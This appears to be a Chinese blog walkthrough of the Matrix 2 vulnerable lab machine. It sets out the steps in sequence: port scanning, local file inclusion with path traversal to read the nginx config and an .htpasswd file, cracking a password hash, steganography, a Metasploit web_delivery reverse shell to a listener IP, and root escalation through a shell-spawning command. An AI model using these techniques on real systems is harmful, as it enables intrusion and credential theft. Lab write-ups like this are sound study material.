vulhub-Matrix 2

端口扫描

80,1337,12320,12321,12322....

多个端口运行在http

没啥东西

在nmap扫描时12322有爆出目录/robots.txt看看

file_view.php访问后是空白页面

fuzz一下参数(上一章节有),是file

试试文件包含

获得两个用户n30Neo

是ngnix的服务读取敏感文件看看

file = ../../../../../etc/nginx/sites-available/default

这里面可以看到密码储存在 **/var/www/p4ss/.htpasswd

查看一下它得到**Tr1n17y 的用户的密码哈希值,用john破解

用户名:Tr1n17y 密码:admin

登入上面的页面

查看页面源码

查看一下源码

有个隐藏图片

看一下

用 steghide ”的工具来查找图像中是否隐藏有任何文件

用它登入12320端口ssh

use exploit/multi/script/web_delivery

set lhost 192.168.1.107

set srvhost 192.168.1.107

exploit

创建一个python漏洞脚本,反弹到msf上

ls -lhai

阅读一下bash_history

morpheus 'BEGIN {system("/bin/sh")}' ```sh and got the root flag..

morpheus 'BEGIN {system("/bin/sh")}执行试试,成功提权root

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值